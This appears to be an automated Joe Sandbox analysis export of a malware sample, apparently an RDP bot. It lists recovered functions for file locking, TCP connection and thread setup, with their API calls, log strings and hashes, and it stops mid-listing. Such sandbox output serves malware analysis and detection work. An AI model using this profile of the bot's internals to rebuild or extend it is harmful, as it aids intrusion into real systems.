Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
API String ID: 548194777-214984806
Opcode ID: 44709c66087d480dd46c90760e8c114c95b82e3d763f2883a4c80b46c0773f74
Instruction ID: 00f7d5ad44f05b6a11aead82f3ffa47cd78e5f2bbbaf9d2cc15cbf65b831d6ab
Opcode Fuzzy Hash: 44709c66087d480dd46c90760e8c114c95b82e3d763f2883a4c80b46c0773f74
Instruction Fuzzy Hash: 1981D623A1C64393FB609B15E4107B963AAAF84788F444831DA4DE7797DF3EE505E30A

Function 00007FF6EF65685F Relevance: 28.2, APIs: 5, Strings: 11, Instructions: 199fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001FC7A4F13D0,?,00007FF6EF668500,00007FF6EF651669), ref: 00007FF6EF6568B7
LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001FC7A4F13D0,?,00007FF6EF668500,00007FF6EF651669), ref: 00007FF6EF6568F0
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001FC7A4F13D0,?,00007FF6EF668500,00007FF6EF651669), ref: 00007FF6EF6569C5
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001FC7A4F13D0,?,00007FF6EF668500,00007FF6EF651669), ref: 00007FF6EF656AAA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,000001FC7A4F13D0,?,00007FF6EF668500,00007FF6EF651669), ref: 00007FF6EF656C1E

Strings

[E] (%s) -> Failed(path=%s,err=%08x), xrefs: 00007FF6EF65694B
NULL, xrefs: 00007FF6EF656C29
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FF6EF65697F, 00007FF6EF6569AF
service, xrefs: 00007FF6EF656862
(lock != NULL), xrefs: 00007FF6EF6569A1
(path != NULL), xrefs: 00007FF6EF656971
[E] (%s) -> LockFileEx failed(path=%s,gle=%lu), xrefs: 00007FF6EF656ABF
fs_file_lock, xrefs: 00007FF6EF656944, 00007FF6EF656978, 00007FF6EF6569A8, 00007FF6EF6569D3, 00007FF6EF656AB8, 00007FF6EF656C3B
[I] (%s) -> Done(path=%s,lock=%p), xrefs: 00007FF6EF656C42
[E] (%s) -> CreateFileA failed(path=%s,gle=%lu), xrefs: 00007FF6EF6569DA
C:/Projects/rdp/bot/codebase/fs.c, xrefs: 00007FF6EF65696A, 00007FF6EF65699A

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: ErrorFileLast$CloseCreateHandleLock
String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
API String ID: 2747014929-2960251455
Opcode ID: be39724d04e317b0adf5bb95a305d268c124e39e87b03d831ce14efb91c32fb1
Instruction ID: f1ae9090070c84ae3b71204a5a5d3cb6a4d7386161774e37792d5025a10cf40b
Opcode Fuzzy Hash: be39724d04e317b0adf5bb95a305d268c124e39e87b03d831ce14efb91c32fb1
Instruction Fuzzy Hash: BE815E62E0C74B83FA30A744A44037833589F11764F144A32D96EE66D3EE6FA985F34B

Function 00007FFE0E135A3C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE0E135A60
htonl.WS2_32 ref: 00007FFE0E135AFC
htons.WS2_32 ref: 00007FFE0E135B0D
connect.WS2_32 ref: 00007FFE0E135B26
WSAGetLastError.WS2_32 ref: 00007FFE0E135B4C
select.WS2_32 ref: 00007FFE0E135BBC
WSAGetLastError.WS2_32 ref: 00007FFE0E135BCC
WSAGetLastError.WS2_32 ref: 00007FFE0E135C0E

Part of subcall function 00007FFE0E1356D9: ioctlsocket.WS2_32 ref: 00007FFE0E1356FF

Part of subcall function 00007FFE0E135624: setsockopt.WS2_32 ref: 00007FFE0E13564C
Part of subcall function 00007FFE0E135624: setsockopt.WS2_32 ref: 00007FFE0E135678

WSAGetLastError.WS2_32 ref: 00007FFE0E135C3B

Strings

[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE0E135C7D
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0E135C53
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE0E135BFD
tcp_connect, xrefs: 00007FFE0E135ABD, 00007FFE0E135BD8, 00007FFE0E135BF6, 00007FFE0E135C23, 00007FFE0E135C4C, 00007FFE0E135C76
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0E135BDF
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0E135C2A
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE0E135AC4

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 59720e605f07cf00f7b3e6a0eb2fe6dcb1ad176796c9dd7124adee1b37e63f04
Instruction ID: 206e03ef89762473cad6fcd600fdb357e8a93914950f73856e546dace1ac5926
Opcode Fuzzy Hash: 59720e605f07cf00f7b3e6a0eb2fe6dcb1ad176796c9dd7124adee1b37e63f04
Instruction Fuzzy Hash: 2A5183B1A0C64282F6205B65E8402BA7752EF85BA4F140337D9EE477F9EE7CE5499700

Function 00007FFE126D175C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE126D1780
htonl.WS2_32 ref: 00007FFE126D181C
htons.WS2_32 ref: 00007FFE126D182D
connect.WS2_32 ref: 00007FFE126D1846
WSAGetLastError.WS2_32 ref: 00007FFE126D186C
select.WS2_32 ref: 00007FFE126D18DC
WSAGetLastError.WS2_32 ref: 00007FFE126D18EC
WSAGetLastError.WS2_32 ref: 00007FFE126D192E

Part of subcall function 00007FFE126D13F9: ioctlsocket.WS2_32 ref: 00007FFE126D141F

Part of subcall function 00007FFE126D1344: setsockopt.WS2_32 ref: 00007FFE126D136C
Part of subcall function 00007FFE126D1344: setsockopt.WS2_32 ref: 00007FFE126D1398

WSAGetLastError.WS2_32 ref: 00007FFE126D195B

Strings

[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE126D1973
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE126D191D
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE126D194A
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE126D18FF
tcp_connect, xrefs: 00007FFE126D17DD, 00007FFE126D18F8, 00007FFE126D1916, 00007FFE126D1943, 00007FFE126D196C, 00007FFE126D1996
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE126D17E4
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE126D199D

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 08a4b01bbb4ca8986ec5fe618f39771ea5e7d8498fbdd25a8761da3d7d4182e2
Instruction ID: e8b45b79be7e114820ee9b046a86b3c2080dc23907336bab1b16c27052daf727
Opcode Fuzzy Hash: 08a4b01bbb4ca8986ec5fe618f39771ea5e7d8498fbdd25a8761da3d7d4182e2
Instruction Fuzzy Hash: 5A518061B08E4E83EB209B27EC002B96691EF95774F1413F5E8AD46AF5EEFDE5058700

Function 00007FFE11EC42EC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE11EC4310
htonl.WS2_32 ref: 00007FFE11EC43AC
htons.WS2_32 ref: 00007FFE11EC43BD
connect.WS2_32 ref: 00007FFE11EC43D6
WSAGetLastError.WS2_32 ref: 00007FFE11EC43FC
select.WS2_32 ref: 00007FFE11EC446C
WSAGetLastError.WS2_32 ref: 00007FFE11EC447C
WSAGetLastError.WS2_32 ref: 00007FFE11EC44BE

Part of subcall function 00007FFE11EC3F89: ioctlsocket.WS2_32 ref: 00007FFE11EC3FAF

Part of subcall function 00007FFE11EC3ED4: setsockopt.WS2_32 ref: 00007FFE11EC3EFC
Part of subcall function 00007FFE11EC3ED4: setsockopt.WS2_32 ref: 00007FFE11EC3F28

WSAGetLastError.WS2_32 ref: 00007FFE11EC44EB

Strings

[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE11EC44AD
[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE11EC452D
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE11EC448F
tcp_connect, xrefs: 00007FFE11EC436D, 00007FFE11EC4488, 00007FFE11EC44A6, 00007FFE11EC44D3, 00007FFE11EC44FC, 00007FFE11EC4526
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11EC4503
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE11EC4374
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE11EC44DA

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 9fc70c812d4a1464bb8872bcab90c1922926843d2b5615a3dd5e1254a0653fb6
Instruction ID: 439e93bb1d9e03de6ad842e4fb4cc48d1b4ec2d1126b0506d683e8403b41f2dd
Opcode Fuzzy Hash: 9fc70c812d4a1464bb8872bcab90c1922926843d2b5615a3dd5e1254a0653fb6
Instruction Fuzzy Hash: 1851C461A0CE4281EB209B9BEC053BF6698EF84774F9823B6D82D426F4DE7DF5058700

Function 00007FFE0E16B00C Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE0E16B030
htonl.WS2_32 ref: 00007FFE0E16B0CC
htons.WS2_32 ref: 00007FFE0E16B0DD
connect.WS2_32 ref: 00007FFE0E16B0F6
WSAGetLastError.WS2_32 ref: 00007FFE0E16B11C
select.WS2_32 ref: 00007FFE0E16B18C
WSAGetLastError.WS2_32 ref: 00007FFE0E16B19C
WSAGetLastError.WS2_32 ref: 00007FFE0E16B1DE

Part of subcall function 00007FFE0E16ACA9: ioctlsocket.WS2_32 ref: 00007FFE0E16ACCF

Part of subcall function 00007FFE0E16ABF4: setsockopt.WS2_32 ref: 00007FFE0E16AC1C
Part of subcall function 00007FFE0E16ABF4: setsockopt.WS2_32 ref: 00007FFE0E16AC48

WSAGetLastError.WS2_32 ref: 00007FFE0E16B20B

Strings

[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE0E16B24D
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0E16B1AF
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE0E16B1CD
tcp_connect, xrefs: 00007FFE0E16B08D, 00007FFE0E16B1A8, 00007FFE0E16B1C6, 00007FFE0E16B1F3, 00007FFE0E16B21C, 00007FFE0E16B246
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0E16B1FA
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0E16B223
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE0E16B094

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 53de8601f913020fc363fbe923367388d67ffaaf6f648c3d0281c520f93d4c4c
Instruction ID: ba6237854a05914372f00b0cc8adeb73c5c546e7ce968352da356ac00c7a651f
Opcode Fuzzy Hash: 53de8601f913020fc363fbe923367388d67ffaaf6f648c3d0281c520f93d4c4c
Instruction Fuzzy Hash: DC51C221A0C64382EA209B25E804BB97A61EF45BA4F540337E9FE876F6DF7DE545C340

Function 00007FFE0EB420FC Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 139networkCOMMON

Download Yara Rule

APIs

socket.WS2_32 ref: 00007FFE0EB42120
htonl.WS2_32 ref: 00007FFE0EB421BC
htons.WS2_32 ref: 00007FFE0EB421CD
connect.WS2_32 ref: 00007FFE0EB421E6
WSAGetLastError.WS2_32 ref: 00007FFE0EB4220C
select.WS2_32 ref: 00007FFE0EB4227C
WSAGetLastError.WS2_32 ref: 00007FFE0EB4228C
WSAGetLastError.WS2_32 ref: 00007FFE0EB422CE

Part of subcall function 00007FFE0EB41D99: ioctlsocket.WS2_32 ref: 00007FFE0EB41DBF

Part of subcall function 00007FFE0EB41CE4: setsockopt.WS2_32 ref: 00007FFE0EB41D0C
Part of subcall function 00007FFE0EB41CE4: setsockopt.WS2_32 ref: 00007FFE0EB41D38

WSAGetLastError.WS2_32 ref: 00007FFE0EB422FB

Strings

[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u), xrefs: 00007FFE0EB4233D
tcp_connect, xrefs: 00007FFE0EB4217D, 00007FFE0EB42298, 00007FFE0EB422B6, 00007FFE0EB422E3, 00007FFE0EB4230C, 00007FFE0EB42336
[E] (%s) -> connection failed(host=%08x,port=%u), xrefs: 00007FFE0EB42184
[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d), xrefs: 00007FFE0EB4229F
[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0EB42313
[E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d), xrefs: 00007FFE0EB422EA
[W] (%s) -> select timedout(sock=0x%llx,timeo=%u), xrefs: 00007FFE0EB422BD

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
API String ID: 3154682637-708158336
Opcode ID: 73e29e2a7b89a0ff7a7e3ac32ed82f0bebae691cbd4a0bdb682babcfef2e7c2a
Instruction ID: 1a7f7a69bfcd799f6c5dafe123f2302f874c2cea1a40fb85e359b7d10452344e
Opcode Fuzzy Hash: 73e29e2a7b89a0ff7a7e3ac32ed82f0bebae691cbd4a0bdb682babcfef2e7c2a
Instruction Fuzzy Hash: 745183A2B0C74282E6356F19E8003BA6691EF847A4F140336EAEE477F5DE7DE5459B00

Function 00007FFE0E1317F8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE0E131813
CreateThread.KERNEL32 ref: 00007FFE0E131853
GetLastError.KERNEL32 ref: 00007FFE0E13189B
GetLastError.KERNEL32 ref: 00007FFE0E131973

Part of subcall function 00007FFE0E1340D2: fwrite.MSVCRT ref: 00007FFE0E13417E
Part of subcall function 00007FFE0E1340D2: fflush.MSVCRT ref: 00007FFE0E13418A

Strings

[I] (%s) -> %s, xrefs: 00007FFE0E131A7A
ebus_init, xrefs: 00007FFE0E131880, 00007FFE0E1318A6, 00007FFE0E13197E, 00007FFE0E131A73
, xrefs: 00007FFE0E1318B9
, xrefs: 00007FFE0E131991
~, xrefs: 00007FFE0E131919
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE0E131887
Done, xrefs: 00007FFE0E131A6C
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE0E1318AD
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE0E131985
~, xrefs: 00007FFE0E1319E6
P, xrefs: 00007FFE0E1319EB
P, xrefs: 00007FFE0E131922

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: 5abe49d087058364e46ad2905a861be8bca4930353659010610e86f769bd5388
Instruction ID: 5c2b5abc877f5d3872f8fb5b4cb010999b14779b170c294736865dc5fb18e0f2
Opcode Fuzzy Hash: 5abe49d087058364e46ad2905a861be8bca4930353659010610e86f769bd5388
Instruction Fuzzy Hash: 4C5126A0F0E743A2FB308B24A8C03B83251AF09765F244777C5FE066F1DE6EA9959305

Function 00007FFE126D64F8 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE126D6513
CreateThread.KERNEL32 ref: 00007FFE126D6553
GetLastError.KERNEL32 ref: 00007FFE126D659B
GetLastError.KERNEL32 ref: 00007FFE126D6673

Part of subcall function 00007FFE126D77A2: fwrite.MSVCRT ref: 00007FFE126D784E
Part of subcall function 00007FFE126D77A2: fflush.MSVCRT ref: 00007FFE126D785A

Strings

~, xrefs: 00007FFE126D66E6
[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu), xrefs: 00007FFE126D6685
, xrefs: 00007FFE126D6691
P, xrefs: 00007FFE126D66EB
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE126D6587
[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu), xrefs: 00007FFE126D65AD
P, xrefs: 00007FFE126D6622
, xrefs: 00007FFE126D65B9
ebus_init, xrefs: 00007FFE126D6580, 00007FFE126D65A6, 00007FFE126D667E, 00007FFE126D6773
~, xrefs: 00007FFE126D6619
Done, xrefs: 00007FFE126D676C
[I] (%s) -> %s, xrefs: 00007FFE126D677A

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
API String ID: 1412730629-3633878399
Opcode ID: b068334e6861a812b339efc78247bfa2848f357ddabbee0e87fbe87dba26481b
Instruction ID: 24a47dd8d607bbce7170685555f7344941672d97d336f7b19568c65e9a38823d
Opcode Fuzzy Hash: b068334e6861a812b339efc78247bfa2848f357ddabbee0e87fbe87dba26481b
Instruction Fuzzy Hash: 5251E660E4CF4F8BFB609B16BD8037822509F14374F6446B6C6AE062F5DEEDAD858346

Function 00007FFE11EC2B78 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 137threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32 ref: 00007FFE11EC2B93
CreateThread.KERNEL32 ref: 00007FFE11EC2BD3
GetLastError.KERNEL32 ref: 00007FFE11EC2C1B
GetLastError.KERNEL32 ref: 00007FFE11EC2CF3

Part of subcall function 00007FFE11EC1352: fwrite.MSVCRT ref: 00007FFE11EC13FE
Part of subcall function 00007FFE11EC1352: fflush.MSVCRT ref: 00007FFE11EC140A

Strings

[I] (%s) -> %s, xrefs: 00007FFE11EC2DFA
, xrefs: 00007FFE11EC2C39
P, xrefs: 00007FFE11EC2D6B
[E] (%s) -> Failed(err=%08x), xrefs: 00007FFE11EC2C07
P, xrefs: 00007FFE11EC2CA2
ebus_init, xrefs: 00007FFE11EC2C00, 00007FFE11EC2C26, 00007FFE11EC2CFE, 00007FFE11EC2DF3
